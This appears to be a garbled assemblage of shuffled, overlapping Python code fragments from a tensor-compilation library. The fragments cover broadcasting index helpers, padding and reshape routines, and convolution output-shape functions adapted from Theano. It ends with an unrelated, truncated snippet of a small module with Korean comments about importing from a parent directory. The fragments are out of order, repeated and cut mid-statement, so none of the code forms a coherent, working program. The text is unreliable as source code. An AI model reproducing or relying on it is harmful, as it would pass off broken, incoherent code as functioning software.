Copied and simplified from Theano (2020/11/08): https://github.com/Theano/Theano/blob/master/theano/tensor/nnet/abstract_conv.py Parameters", "= 0 op1 = [] op2 = [] all_ops = [] for i", "== pm.DEFAULT_SHAPES[0] and node_b.shape == pm.DEFAULT_SHAPES[0]: idx = format_idx([]) return idx, idx, idx", "in node_a.shape: idx = node_a.shape.index(s) all_ops.append(idx) else: assert s in node_b.shape, f\"Output shape", "nmap = {} reverse = True if not broadcastable: reverse = False a_idx", "= pm.index(0, i - 1) op1.append(idx) all_ops.append(idx) cnt += 1 for i in", "out_idx.append(idx) if s in node_a.shape: start = 0 if s in a_map: start", "else: assert border_mode >= 0 pad_l = pad_r = border_mode # In case", "b == 1 or a == b: pass else: return False return True", "- 1) * dilation + 1 if border_mode == \"full\": pad_l = pad_r", "# if len(pad_size) == 2: # pad_h = pad_size[0] * 2 # pad_w", "width of the image. \"\"\" bsize, imshp = image_shape[0], image_shape[2:] convdim = len(image_shape)", "# pad_left = (pad_w + 1) // 2 # return pad_top, pad_left, pad_h", "if s in b_map: start = b_map[s] sidx = node_b.shape.index(s, start) b_idx[sidx] =", "# assert isinstance(pad_size, int) # pad_h = pad_w = pad_size * 2 #", "int. It must correspond to the subsampling on the considered axis. dilation: int.", "pad_size * 2 # # pad_top = (pad_h + 1) // 2 #", "reverse = True if not broadcastable: reverse = False a_idx = [None] *", "else: if not output.shape: raise RuntimeError indices = tuple([pm.index(0, s - 1) for", "int. If it is a string, it must be 'valid' or 'full'. subsample:", "!= (1,): assert padded_shape == padded_out.shape, f\"Unequal shapes for padding:\\n\" \\ f\"Target shape:", "Padding size on right. \"\"\" # pad_h = pad_w = padding * 2", "padded_shape = (data.shape[0], data.shape[1], oh, ow) if padded_out.is_shape_finalized() and padded_out.shape != (1,): assert", "input image shape on a given axis. kernel_shape: int Corresponds to the kernel", "tuple of int. 
Its two or three elements respectively correspond to the subsampling", "output.shape]) return indices def is_broadcastable(shp1, shp2): for a, b in zip(shp1[::-1], shp2[::-1]): if", "1: idx = pm.index(0, node_a.shape[i] - 1) a_idx.append(idx) if zero_indices: b_idx.append(0) # TESTING", "pad_r != 0: out_shp += pad_r if subsample != 1: out_shp = out_shp", "= pm.index(0, lg_node.shape[i] - 1) nmap[\"large\"].append(idx) out_idx.append(idx) elif node_a.shape[i] == node_b.shape[i]: if node_a.shape[i]", "the output shape of convolution operation. Copied and simplified from theano (2020/11/08): https://github.com/Theano/Theano/blob/master/theano/tensor/nnet/abstract_conv.py", "pad_w = padding * 2 pad_h = padding[0] * 2 pad_w = padding[1]", "{padded_out.shape}\" padded_out.set_shape(padded_shape) n_idx = pm.index(0, data.shape[0]-1) c_idx = pm.index(0, data.shape[1]-1) oh_idx = pm.index(0,", "= node_a nmap[\"small\"] = b_idx nmap[\"large\"] = a_idx else: small_node = node_a lg_node", "= [] for s in out_node.shape: if s in node_a.shape: idx = node_a.shape.index(s)", "[] dst_indices = [] for s in data.shape: idx = pm.index(0, s-1) src_indices.append(idx)", "pad_w = padding[1] * 2 pad_top = (pad_h + 1) // 2 pad_left", "4 p_top, p_bottom, p_left, p_right = get_pad_tuple(pad_size, kernel) oh = data.shape[2] + p_top", "tuple(x) def _get_indices(node, all_indices, tgt_shape): indices = [] if node.shape == pm.DEFAULT_SHAPES[0]: return", "node_b.shape == pm.DEFAULT_SHAPES[0]: idx = format_idx([]) indices = _get_single_node_indices(node_a) return indices, idx, indices", "-1): if len(small_node.shape) < abs(i): idx = pm.index(0, lg_node.shape[i] - 1) nmap[\"large\"].append(idx) out_idx.append(idx)", "op1.append(0) # all_ops.append(0) else: idx = pm.index(0, i - 1) op1.append(idx) all_ops.append(idx) cnt", "dilation on the considered axis. 
Returns ------- out_shp: int corresponding to the output", "elif node_a.shape == pm.DEFAULT_SHAPES[0]: idx = format_idx([]) indices = _get_single_node_indices(node_b) return idx, indices,", "+= (pm.index(0, out_shape[i] - 1),) padded = pm.temp(name=name, shape=out_shape) padded[shape_idx] = 0 padded[(shape_idx[0])]", "indices = [] if node.shape == pm.DEFAULT_SHAPES[0]: return tuple(indices) for idx, i in", "idx, i in enumerate(node.shape): if i != tgt_shape[idx]: indices.insert(idx, 0) return tuple(indices) def", "[] b_idx = [] out_idx = [] nmap = {} reverse = True", "of the output, number of input channels, height and width of the kernel.", "the input image shape. Its four (or five) element must correspond respectively to:", "or three elements correspond respectively to the dilation on height and width axis.", "if node.shape == pm.DEFAULT_SHAPES[0]: return tuple([]) else: if not shape: shape = node.shape", "else: # raise ValueError(\"Size of padding can only be 2 or 4\") #", "of the image. \"\"\" bsize, imshp = image_shape[0], image_shape[2:] convdim = len(image_shape) -", "np.prod(shape) assert len(dim_combinations) == len(shape) src_indices = [] dst_indices = [] for s", "convdim = len(image_shape) - 2 nkern, kshp = kernel_shape[0], kernel_shape[-convdim:] if isinstance(border_mode, tuple):", "tuple([pm.index(0, s - 1) for s in output.shape]) return indices def is_broadcastable(shp1, shp2):", "idx = format_idx([]) return idx, idx, idx elif node_a.shape == pm.DEFAULT_SHAPES[0]: idx =", "channels, height and width of the kernel. None where undefined. border_mode: string, or", "reverse = False a_idx = [None] * len(node_a.shape) b_idx = [None] * len(node_b.shape)", "padded_out.shape, f\"Unequal shapes for padding:\\n\" \\ f\"Target shape: {padded_shape}\\n\" \\ f\"Set shape: {padded_out.shape}\"", "operation. 
Copied and simplified from Theano (2020/11/08): https://github.com/Theano/Theano/blob/master/theano/tensor/nnet/abstract_conv.py Parameters ---------- image_shape: tuple of", "out_shp = out_shp // subsample out_shp = out_shp + 1 return out_shp def", "iw_idx = pm.index(0, data.shape[3] - 1) padded_out[(n_idx, c_idx, oh_idx, ow_idx)] = pad_val padded_out[(n_idx,", "unshared 2D convolution, its six channels must correspond to : number of output", "subsample != 1: out_shp = out_shp // subsample out_shp = out_shp + 1", "of padding can only be 2 or 4\") # else: # assert isinstance(pad_size,", "the considered axis. Returns ------- out_shp: int corresponding to the output image shape", "respectively correspond to the padding on height and width (and possibly depth) axis.", "in node_a.shape: if i == 1: op1.append(0) # all_ops.append(0) else: idx = pm.index(0,", "indices = _get_single_node_indices(node_a) return indices, indices, indices elif node_a.shape == pm.DEFAULT_SHAPES[0] and node_b.shape", "node.shape: for idx, i in enumerate(node.shape): if i != tgt_shape[idx]: indices.insert(idx, 0) return", "return op1, op2, all_ops def _get_single_node_indices(node, shape=None): if node.shape == pm.DEFAULT_SHAPES[0]: return tuple([])", "int corresponding to the input image shape. 
Its four (or five) element must", "pad_top, pad_w - pad_left def pad_node(data: pm.Node, padded_out: pm.Node, pad_size, kernel, pad_val=0): assert", "pm.index(0, node_b.shape[i] - 1) if zero_indices: a_idx.append(0) # TESTING b_idx.append(idx) out_idx.append(idx) elif node_b.shape[i]", "node_b.shape == pm.DEFAULT_SHAPES[0]: idx = format_idx([]) return idx, idx, idx elif node_a.shape ==", "!= 0: out_shp += pad_r if subsample != 1: out_shp = out_shp //", "Theano (2020/11/08): https://github.com/Theano/Theano/blob/master/theano/tensor/nnet/abstract_conv.py Parameters ---------- image_shape: tuple of int corresponding to the input", "nmap[\"small\"] = a_idx nmap[\"large\"] = b_idx for i in range(-1, -len(lg_node.shape) - 1,", "width of the output, number of input channels, height and width of the", "- 1) out_idx.append(idx) if s in node_a.shape: start = 0 if s in", "and simplified from theano (2020/11/08): https://github.com/Theano/Theano/blob/master/theano/tensor/nnet/abstract_conv.py Parameters ---------- image_shape: int Corresponds to the", "of input channels, height and width (and possibly depth) of the kernel. For", "(and possibly depth) axis. subsample: tuple of int. Its two or three elements", "nz_indices = () shape_idx = () for i in range(n): out_shape += ((var.shape[i]", "int Padding size on right. \"\"\" # pad_h = pad_w = padding *", "width (and possibly depth) axis. filter_dilation: tuple of int. 
Its two or three", "reversed(dc): idx = src_indices[d]*idx_offset + add_dim idx_offset = data.shape[d] def _get_indices_for_dim(x, dim): assert", "kernel): \"\"\"Common code to get the pad option Parameters ---------- padding : int", "lg_node = node_a nmap[\"small\"] = b_idx nmap[\"large\"] = a_idx else: small_node = node_a", "return indices def _get_reduce_node_indices(a, b, output, axis): if output.shape == pm.DEFAULT_SHAPES[0]: return tuple([])", "to broadcast indices:\\n\" f\"{node_a.name}: {node_a.shape}\\n\" f\"{node_b.name}: {node_b.shape}\\n\") return format_idx(a_idx, reverse), format_idx(b_idx, reverse), format_idx(out_idx,", "= padding[0] * 2 pad_w = padding[1] * 2 pad_top = (pad_h +", "dil_kernel_shape) // subsample + 1 out_shp = image_shape - dil_kernel_shape if pad_l !=", "range(-1, -len(lg_node.shape) - 1, -1): if len(small_node.shape) < abs(i): idx = pm.index(0, lg_node.shape[i]", "== pm.DEFAULT_SHAPES[0]: return tuple(indices) for idx, i in enumerate(all_indices): if len(node.shape) > idx", "import numpy as np def format_idx(x, reverse=True): if reverse: return tuple(list(reversed(x))) else: return", "d in reversed(dc): idx = src_indices[d]*idx_offset + add_dim idx_offset = data.shape[d] def _get_indices_for_dim(x,", "a given axis. border_mode: string or int. If it is a string, it", "assert isinstance(pad_size, int) # pad_h = pad_w = pad_size * 2 # #", "def reshape_node(data: pm.Node, reshaped_out: pm.Node, shape: tuple, dim_combinations): assert np.prod(data.shape) == np.prod(shape) assert", "out_shp def _get_conv_output_shape( image_shape, kernel_shape, border_mode, subsample, filter_dilation=(0, 0) ): \"\"\"This function compute", "subsample + 1 out_shp = image_shape - dil_kernel_shape if pad_l != 0: out_shp", "channels, height and width of the output, number of input channels, height and", "tuple of int corresponding to the input image shape. 
Its four (or five)", ") for i in range(len(subsample)) ) else: out_shp = tuple( _get_conv_shape_1axis( imshp[i], kshp[i],", "pad_down : int Padding size on down. pad_right : int Padding size on", "Padding size on down. pad_right : int Padding size on right. \"\"\" #", "= len(var.shape) assert len(strides) == n out_shape = () nz_indices = () shape_idx", "padded_out.is_shape_finalized() and padded_out.shape != (1,): assert padded_shape == padded_out.shape, f\"Unequal shapes for padding:\\n\"", "all_ops.append(idx) cnt += 1 for i in node_b.shape: if i in node_a.shape: idx", "imshp[i], kshp[i], border_mode[i], subsample[i], filter_dilation[i], ) for i in range(len(subsample)) ) else: out_shp", "if out_node.is_shape_finalized(): all_ops = [] for s in out_node.shape: if s in node_a.shape:", "i in node_a.shape: if i == 1: op1.append(0) # all_ops.append(0) else: idx =", "* 2 # pad_w = pad_size[1] * 2 # elif len(pad_size) == 4:", "return pad_size[0], pad_size[2], pad_size[1], pad_size[3] # else: # raise ValueError(\"Size of padding can", "and padded_out.shape != (1,): assert padded_shape == padded_out.shape, f\"Unequal shapes for padding:\\n\" \\", "or 'full'. If it is a tuple, its two (or three) elements respectively", "node_b, out_node): # TODO: Figure out what to do about multiple dimensions with", "int Corresponds to the kernel shape on a given axis. border_mode: string or", "pad_size[3] # else: # raise ValueError(\"Size of padding can only be 2 or", "pm.index(0, data.shape[3] - 1) padded_out[(n_idx, c_idx, oh_idx, ow_idx)] = pad_val padded_out[(n_idx, c_idx, ih_idx", "must be 'valid' or 'full'. subsample: int. 
It must correspond to the subsampling", "tgt_shape[idx]: indices.insert(idx, 0) return tuple(indices) def _get_binop_idx(node_a, node_b, out_node): # TODO: Figure out", "isinstance(border_mode, tuple): out_shp = tuple( _get_conv_shape_1axis( imshp[i], kshp[i], border_mode[i], subsample[i], filter_dilation[i], ) for", "elements correspond respectively to the dilation on height and width axis. Returns -------", "pad_h - pad_top, pad_w - pad_left def get_pad_tuple(padding, kernel): \"\"\"Common code to get", "indices, indices, indices elif node_a.shape == pm.DEFAULT_SHAPES[0] and node_b.shape == pm.DEFAULT_SHAPES[0]: idx =", "assert border_mode >= 0 pad_l = pad_r = border_mode # In case of", "to build the smallest graph # (image_shape + 2 * pad - dil_kernel_shape)", "def _get_elem_indices(node_a, node_b, node_c, zero_indices=True): broadcastable = is_broadcastable(node_a.shape, node_b.shape) a_idx = [] b_idx", "a_idx = [None] * len(node_a.shape) b_idx = [None] * len(node_b.shape) a_map = {}", "for s in out_node.shape: if s in node_a.shape: idx = node_a.shape.index(s) all_ops.append(idx) else:", "return idx, indices, indices elif node_b.shape == pm.DEFAULT_SHAPES[0]: idx = format_idx([]) indices =", "pm.index(0, ow-1) iw_idx = pm.index(0, data.shape[3] - 1) padded_out[(n_idx, c_idx, oh_idx, ow_idx)] =", "assert len(strides) == n out_shape = () nz_indices = () shape_idx = ()", "is None: return dim if dim < 0: dim = len(a_shp) + dim", "= tuple( _get_conv_shape_1axis( imshp[i], kshp[i], border_mode[i], subsample[i], filter_dilation[i], ) for i in range(len(subsample))", "1 or a == b: pass else: return False return True # Use", "else: idx = pm.index(0, i - 1) op1.append(idx) all_ops.append(idx) cnt += 1 for", "1 b_idx[i] = 0 else: if node_a.shape == node_b.shape and node_c.shape == node_a.shape:", "- pad_left def pad_node(data: pm.Node, padded_out: pm.Node, pad_size, kernel, pad_val=0): assert len(data.shape) ==", "elements must correspond respectively to : number of 
output channels, number of input", ">= 0 pad_l = pad_r = border_mode # In case of symbolic shape,", "number of input channels, height and width (and possibly depth) of the image.", "dim def _get_conv_shape_1axis( image_shape, kernel_shape, border_mode, subsample, dilation=1 ): \"\"\"This function compute the", "shape=out_shape) padded[shape_idx] = 0 padded[(shape_idx[0])] = 0 # def get_pad_tuple(pad_size): # if isinstance(pad_size,", "b: pass else: return False return True # Use numpy broadcasting rules def", "= sidx for i in range(len(a_idx)): if a_idx[i] is None: assert node_a.shape[i] ==", "enumerate(node.shape): if i != tgt_shape[idx]: indices.insert(idx, 0) return tuple(indices) def _get_binop_idx(node_a, node_b, out_node):", "1 if out_node.is_shape_finalized(): all_ops = [] for s in out_node.shape: if s in", "node_b.shape[i] == 1 b_idx[i] = 0 else: if node_a.shape == node_b.shape and node_c.shape", "== 1 b_idx[i] = 0 else: if node_a.shape == node_b.shape and node_c.shape ==", "pad_size[1] * 2 # elif len(pad_size) == 4: # return pad_size[0], pad_size[2], pad_size[1],", "pm.index(0, x.shape[dim] - 1) return idx def _dim_explicit(a_shp, dim): if dim is None:", "idx = pm.index(0, i - 1) op2.append(idx) all_ops.append(idx) cnt += 1 if out_node.is_shape_finalized():", "0 padded[(shape_idx[0])] = 0 # def get_pad_tuple(pad_size): # if isinstance(pad_size, (tuple, list)): #", "int. If it is a string, it must be 'valid' or 'full'. If", "0 for i in range(len(b_idx)): if b_idx[i] is None: assert node_b.shape[i] == 1", "------- out_shp: int corresponding to the output image shape on the considered axis.", "height and width (and possibly depth) of the kernel. For an unshared 2D", "output shape of convolution operation. 
Copied and simplified from theano (2020/11/08): https://github.com/Theano/Theano/blob/master/theano/tensor/nnet/abstract_conv.py Parameters", "size Returns ------- pad_top : int Padding size on top pad_left : int", "nmap[\"small\"] = b_idx nmap[\"large\"] = a_idx else: small_node = node_a lg_node = node_b", "\"\"\"Common code to get the pad option Parameters ---------- padding : int or", "for s in shape]) return indices def _get_reduce_node_indices(a, b, output, axis): if output.shape", "and width (and possibly depth) of the kernel. For an unshared 2D convolution,", "Figure out what to do about multiple dimensions with the same value cnt", "where undefined. kernel_shape: tuple of int corresponding to the kernel shape. For a", "if s in node_b.shape: start = 0 if s in b_map: start =", "p_top, p_bottom, p_left, p_right = get_pad_tuple(pad_size, kernel) oh = data.shape[2] + p_top +", "In case of symbolic shape, we want to build the smallest graph #", "kshp[i], border_mode, subsample[i], filter_dilation[i] ) for i in range(len(subsample)) ) return (bsize, nkern)", "1) // 2 # pad_left = (pad_w + 1) // 2 # return", "- 1) if zero_indices: a_idx.append(0) # TESTING b_idx.append(idx) out_idx.append(idx) elif node_b.shape[i] == 1:", "kshp[i], border_mode[i], subsample[i], filter_dilation[i], ) for i in range(len(subsample)) ) else: out_shp =", "p_right padded_shape = (data.shape[0], data.shape[1], oh, ow) if padded_out.is_shape_finalized() and padded_out.shape != (1,):", "oh_idx = pm.index(0, oh-1) ih_idx = pm.index(0, data.shape[2]-1) ow_idx = pm.index(0, ow-1) iw_idx", "= tuple([pm.index(0, s - 1) for s in output.shape]) return indices def is_broadcastable(shp1,", "2 pad_h = padding[0] * 2 pad_w = padding[1] * 2 pad_top =", "is a string, it must be 'valid' or 'full'. If it is a", "idx = pm.index(0, lg_node.shape[i] - 1) nmap[\"large\"].append(idx) out_idx.append(idx) elif node_a.shape[i] == node_b.shape[i]: if", "None where undefined. border_mode: string, or tuple of int. 
If it is a", "<reponame>lite-david/polymath import polymath as pm import numpy as np def format_idx(x, reverse=True): if", "border_mode, subsample, filter_dilation=(0, 0) ): \"\"\"This function compute the output shape of convolution", "= pm.index(0, s-1) src_indices.append(idx) # STEP 0: idx3*1 + 0 # STEP 1:", "(1,): assert padded_shape == padded_out.shape, f\"Unequal shapes for padding:\\n\" \\ f\"Target shape: {padded_shape}\\n\"", "or b == 1 or a == b: pass else: return False return", "* 2 pad_h = padding[0] * 2 pad_w = padding[1] * 2 pad_top", "# pad_h = pad_w = pad_size * 2 # # pad_top = (pad_h", "\"\"\" # Implicit dilated kernel shape dil_kernel_shape = (kernel_shape - 1) * dilation", "shape of convolution operation. Copied and simplified from Theano (2020/11/08): https://github.com/Theano/Theano/blob/master/theano/tensor/nnet/abstract_conv.py Parameters ----------", "dimensions with the same value cnt = 0 op1 = [] op2 =", "shape of convolution operation. Copied and simplified from theano (2020/11/08): https://github.com/Theano/Theano/blob/master/theano/tensor/nnet/abstract_conv.py Parameters ----------", "out_idx.append(idx) elif node_b.shape[i] == 1: idx = pm.index(0, node_a.shape[i] - 1) a_idx.append(idx) if", "= node_b nmap[\"small\"] = a_idx nmap[\"large\"] = b_idx for i in range(-1, -len(lg_node.shape)", "idx elif node_a.shape == pm.DEFAULT_SHAPES[0]: idx = format_idx([]) indices = _get_single_node_indices(node_b) return idx,", "the kernel shape on a given axis. border_mode: string or int. If it", "range(len(a_idx)): if a_idx[i] is None: assert node_a.shape[i] == 1 a_idx[i] = 0 for", "shape: shape = node.shape indices = tuple([pm.index(0, s - 1) for s in", "output channels, height and width of the image. \"\"\" bsize, imshp = image_shape[0],", "a string, it must be 'valid' or 'full'. 
If it is a tuple,", "elif len(pad_size) == 4: # return pad_size[0], pad_size[2], pad_size[1], pad_size[3] # else: #", "2 # return pad_top, pad_left, pad_h - pad_top, pad_w - pad_left def get_pad_tuple(padding,", "- pad_left def get_pad_tuple(padding, kernel): \"\"\"Common code to get the pad option Parameters", "node_a nmap[\"small\"] = b_idx nmap[\"large\"] = a_idx else: small_node = node_a lg_node =", "- 1) return idx def _dim_explicit(a_shp, dim): if dim is None: return dim", "dc in reversed(dim_combinations): idx = 0 idx_offset = 1 add_dim = 0 for", "the kernel. None where undefined. border_mode: string, or tuple of int. If it", "option Parameters ---------- padding : int or str Padding size, or ['VALID', 'SAME']", "= [None] * len(node_b.shape) a_map = {} b_map = {} for s in", "def _get_binop_idx(node_a, node_b, out_node): # TODO: Figure out what to do about multiple", "in output.shape]) return indices def is_broadcastable(shp1, shp2): for a, b in zip(shp1[::-1], shp2[::-1]):", "a_idx[i] = 0 for i in range(len(b_idx)): if b_idx[i] is None: assert node_b.shape[i]", "tgt_shape != node.shape: for idx, i in enumerate(node.shape): if i != tgt_shape[idx]: indices.insert(idx,", "pm import numpy as np def format_idx(x, reverse=True): if reverse: return tuple(list(reversed(x))) else:", "Use numpy broadcasting rules def _get_elem_indices(node_a, node_b, node_c, zero_indices=True): broadcastable = is_broadcastable(node_a.shape, node_b.shape)", "return True # Use numpy broadcasting rules def _get_elem_indices(node_a, node_b, node_c, zero_indices=True): broadcastable", "0) ): \"\"\"This function compute the output shape of convolution operation. 
Copied and", "format_idx([]) indices = _get_single_node_indices(node_b) return idx, indices, indices elif node_b.shape == pm.DEFAULT_SHAPES[0]: idx", "reverse: return tuple(list(reversed(x))) else: return tuple(x) def _get_indices(node, all_indices, tgt_shape): indices = []", "image_shape, kernel_shape, border_mode, subsample, filter_dilation=(0, 0) ): \"\"\"This function compute the output shape", "p_bottom, p_left, p_right = get_pad_tuple(pad_size, kernel) oh = data.shape[2] + p_top + p_bottom", "as np def format_idx(x, reverse=True): if reverse: return tuple(list(reversed(x))) else: return tuple(x) def", "+ 1) // 2 pad_left = (pad_w + 1) // 2 return pad_top,", "2 * pad - dil_kernel_shape) // subsample + 1 out_shp = image_shape -", "- 1) nmap[\"large\"].append(idx) out_idx.append(idx) elif node_a.shape[i] == node_b.shape[i]: if node_a.shape[i] != 1: idx", "axis. filter_dilation: tuple of int. Its two or three elements correspond respectively to", "nmap[\"large\"] = a_idx else: small_node = node_a lg_node = node_b nmap[\"small\"] = a_idx", "* 2 pad_top = (pad_h + 1) // 2 pad_left = (pad_w +", "- 1, stride=strides[i]),) shape_idx += (pm.index(0, out_shape[i] - 1),) padded = pm.temp(name=name, shape=out_shape)", "nmap[\"large\"] = b_idx for i in range(-1, -len(lg_node.shape) - 1, -1): if len(small_node.shape)", "b_idx[sidx] = idx b_map[s] = sidx for i in range(len(a_idx)): if a_idx[i] is", "(for 3D convolution) elements must correspond respectively to : number of output channels,", "- 1) op2.append(idx) all_ops.append(idx) cnt += 1 if out_node.is_shape_finalized(): all_ops = [] for", "kernel. For an unshared 2D convolution, its six channels must correspond to :", "of output channels, height and width of the image. \"\"\" bsize, imshp =", "width (and possibly depth) axis. subsample: tuple of int. 
Its two or three", "- dil_kernel_shape) // subsample + 1 out_shp = image_shape - dil_kernel_shape if pad_l", "= pad_size[0] * 2 # pad_w = pad_size[1] * 2 # elif len(pad_size)", "pad_l != 0: out_shp += pad_l if pad_r != 0: out_shp += pad_r", "s-1) src_indices.append(idx) # STEP 0: idx3*1 + 0 # STEP 1: idx3 +", "pad_node(data: pm.Node, padded_out: pm.Node, pad_size, kernel, pad_val=0): assert len(data.shape) == 4 p_top, p_bottom,", "in shape]) return indices def _get_reduce_node_indices(a, b, output, axis): if output.shape == pm.DEFAULT_SHAPES[0]:", "len(data.shape) == 4 p_top, p_bottom, p_left, p_right = get_pad_tuple(pad_size, kernel) oh = data.shape[2]", "2 # pad_left = (pad_w + 1) // 2 # return pad_top, pad_left,", "number of output channels, height and width of the output, number of input", "if i in node_a.shape: idx = node_a.shape.index(i) op2.append(op1[idx]) elif i == 1: op2.append(0)", "= 0 for i in range(len(b_idx)): if b_idx[i] is None: assert node_b.shape[i] ==", "kernel_shape[0], kernel_shape[-convdim:] if isinstance(border_mode, tuple): out_shp = tuple( _get_conv_shape_1axis( imshp[i], kshp[i], border_mode[i], subsample[i],", "data.shape[1], oh, ow) if padded_out.is_shape_finalized() and padded_out.shape != (1,): assert padded_shape == padded_out.shape,", "(tuple, list)): # if len(pad_size) == 2: # pad_h = pad_size[0] * 2", "padded_shape == padded_out.shape, f\"Unequal shapes for padding:\\n\" \\ f\"Target shape: {padded_shape}\\n\" \\ f\"Set", "case of symbolic shape, we want to build the smallest graph # (image_shape", "[] nmap = {} reverse = True if not broadcastable: reverse = False", "a == b: pass else: return False return True # Use numpy broadcasting", "+= pad_r if subsample != 1: out_shp = out_shp // subsample out_shp =", "start) a_idx[sidx] = idx a_map[s] = sidx if s in node_b.shape: start =", "padding can only be 2 or 4\") # else: # assert isinstance(pad_size, int)", "p_bottom ow = data.shape[3] + p_left + p_right padded_shape = 
(data.shape[0], data.shape[1], oh,", "return tuple(indices) def _get_binop_idx(node_a, node_b, out_node): # TODO: Figure out what to do", "shape: {padded_out.shape}\" padded_out.set_shape(padded_shape) n_idx = pm.index(0, data.shape[0]-1) c_idx = pm.index(0, data.shape[1]-1) oh_idx =", "pad_left, pad_h - pad_top, pad_w - pad_left def pad_node(data: pm.Node, padded_out: pm.Node, pad_size,", "= (pad_w + 1) // 2 return pad_top, pad_left, pad_h - pad_top, pad_w", "# STEP 1: idx3 + shape[3]* for dc in reversed(dim_combinations): idx = 0", "if dim < 0: dim = len(a_shp) + dim return dim def _get_conv_shape_1axis(", "+ 1 return out_shp def _get_conv_output_shape( image_shape, kernel_shape, border_mode, subsample, filter_dilation=(0, 0) ):", "= len(a_shp) + dim return dim def _get_conv_shape_1axis( image_shape, kernel_shape, border_mode, subsample, dilation=1", "out what to do about multiple dimensions with the same value cnt =", "# TESTING b_idx.append(idx) out_idx.append(idx) elif node_b.shape[i] == 1: idx = pm.index(0, node_a.shape[i] -", "i - 1) op1.append(idx) all_ops.append(idx) cnt += 1 for i in node_b.shape: if", "the dilation on the considered axis. Returns ------- out_shp: int corresponding to the", "do about multiple dimensions with the same value cnt = 0 op1 =", "# def get_pad_tuple(pad_size): # if isinstance(pad_size, (tuple, list)): # if len(pad_size) == 2:" ]
[ "Lower directory 참조 def function_2(): print(\"function_2 of second module imported\") def call_function_in_first_module(): print(\"called", "import first_module # Upper directory 에서 Lower directory 참조 def function_2(): print(\"function_2 of", "경로 sys.path.append(UPPER_PATH) # 상위 경로를 추가 from my_tools import first_module # Upper directory", "추가 from my_tools import first_module # Upper directory 에서 Lower directory 참조 def", "= os.path.dirname(os.path.abspath(__file__)) # 스크립트 경로 UPPER_PATH = os.path.dirname(os.path.abspath(os.path.dirname(__file__))) # 상위 경로 sys.path.append(UPPER_PATH) #", "function_2(): print(\"function_2 of second module imported\") def call_function_in_first_module(): print(\"called from second module to", "print(\"function_2 of second module imported\") def call_function_in_first_module(): print(\"called from second module to first", "from my_tools import first_module # Upper directory 에서 Lower directory 참조 def function_2():", "os.getcwd() # 실행 경로 SCRIPT_PATH = os.path.dirname(os.path.abspath(__file__)) # 스크립트 경로 UPPER_PATH = os.path.dirname(os.path.abspath(os.path.dirname(__file__)))", "# -*- coding: utf-8 -*- import os import sys EXE_PATH = os.getcwd() #", "UPPER_PATH = os.path.dirname(os.path.abspath(os.path.dirname(__file__))) # 상위 경로 sys.path.append(UPPER_PATH) # 상위 경로를 추가 from my_tools", "# 상위 경로 sys.path.append(UPPER_PATH) # 상위 경로를 추가 from my_tools import first_module #", "first_module # Upper directory 에서 Lower directory 참조 def function_2(): print(\"function_2 of second", "module imported\") def call_function_in_first_module(): print(\"called from second module to first module\") first_module.function_1() if", "os import sys EXE_PATH = os.getcwd() # 실행 경로 SCRIPT_PATH = os.path.dirname(os.path.abspath(__file__)) #", "def function_2(): print(\"function_2 of second module imported\") def call_function_in_first_module(): print(\"called from second module", "utf-8 -*- import os import sys EXE_PATH = os.getcwd() # 실행 경로 SCRIPT_PATH", "스크립트 경로 
UPPER_PATH = os.path.dirname(os.path.abspath(os.path.dirname(__file__))) # 상위 경로 sys.path.append(UPPER_PATH) # 상위 경로를 추가", "coding: utf-8 -*- import os import sys EXE_PATH = os.getcwd() # 실행 경로", "# 실행 경로 SCRIPT_PATH = os.path.dirname(os.path.abspath(__file__)) # 스크립트 경로 UPPER_PATH = os.path.dirname(os.path.abspath(os.path.dirname(__file__))) #", "-*- coding: utf-8 -*- import os import sys EXE_PATH = os.getcwd() # 실행", "SCRIPT_PATH = os.path.dirname(os.path.abspath(__file__)) # 스크립트 경로 UPPER_PATH = os.path.dirname(os.path.abspath(os.path.dirname(__file__))) # 상위 경로 sys.path.append(UPPER_PATH)", "#!/usr/bin/python3.5 # -*- coding: utf-8 -*- import os import sys EXE_PATH = os.getcwd()", "os.path.dirname(os.path.abspath(os.path.dirname(__file__))) # 상위 경로 sys.path.append(UPPER_PATH) # 상위 경로를 추가 from my_tools import first_module", "directory 참조 def function_2(): print(\"function_2 of second module imported\") def call_function_in_first_module(): print(\"called from", "에서 Lower directory 참조 def function_2(): print(\"function_2 of second module imported\") def call_function_in_first_module():", "imported\") def call_function_in_first_module(): print(\"called from second module to first module\") first_module.function_1() if __name__", "-*- import os import sys EXE_PATH = os.getcwd() # 실행 경로 SCRIPT_PATH =", "# 스크립트 경로 UPPER_PATH = os.path.dirname(os.path.abspath(os.path.dirname(__file__))) # 상위 경로 sys.path.append(UPPER_PATH) # 상위 경로를", "sys.path.append(UPPER_PATH) # 상위 경로를 추가 from my_tools import first_module # Upper directory 에서", "# Upper directory 에서 Lower directory 참조 def function_2(): print(\"function_2 of second module", "실행 경로 SCRIPT_PATH = os.path.dirname(os.path.abspath(__file__)) # 스크립트 경로 UPPER_PATH = os.path.dirname(os.path.abspath(os.path.dirname(__file__))) # 상위", "= os.path.dirname(os.path.abspath(os.path.dirname(__file__))) # 상위 경로 sys.path.append(UPPER_PATH) # 상위 경로를 추가 from my_tools import", "def call_function_in_first_module(): print(\"called from 
second module to first module\") first_module.function_1() if __name__ ==", "상위 경로 sys.path.append(UPPER_PATH) # 상위 경로를 추가 from my_tools import first_module # Upper", "Upper directory 에서 Lower directory 참조 def function_2(): print(\"function_2 of second module imported\")", "경로 UPPER_PATH = os.path.dirname(os.path.abspath(os.path.dirname(__file__))) # 상위 경로 sys.path.append(UPPER_PATH) # 상위 경로를 추가 from", "sys EXE_PATH = os.getcwd() # 실행 경로 SCRIPT_PATH = os.path.dirname(os.path.abspath(__file__)) # 스크립트 경로", "directory 에서 Lower directory 참조 def function_2(): print(\"function_2 of second module imported\") def", "경로 SCRIPT_PATH = os.path.dirname(os.path.abspath(__file__)) # 스크립트 경로 UPPER_PATH = os.path.dirname(os.path.abspath(os.path.dirname(__file__))) # 상위 경로", "# 상위 경로를 추가 from my_tools import first_module # Upper directory 에서 Lower", "of second module imported\") def call_function_in_first_module(): print(\"called from second module to first module\")", "my_tools import first_module # Upper directory 에서 Lower directory 참조 def function_2(): print(\"function_2", "call_function_in_first_module(): print(\"called from second module to first module\") first_module.function_1() if __name__ == \"__main__\":", "= os.getcwd() # 실행 경로 SCRIPT_PATH = os.path.dirname(os.path.abspath(__file__)) # 스크립트 경로 UPPER_PATH =", "EXE_PATH = os.getcwd() # 실행 경로 SCRIPT_PATH = os.path.dirname(os.path.abspath(__file__)) # 스크립트 경로 UPPER_PATH", "print(\"called from second module to first module\") first_module.function_1() if __name__ == \"__main__\": function_2()", "import sys 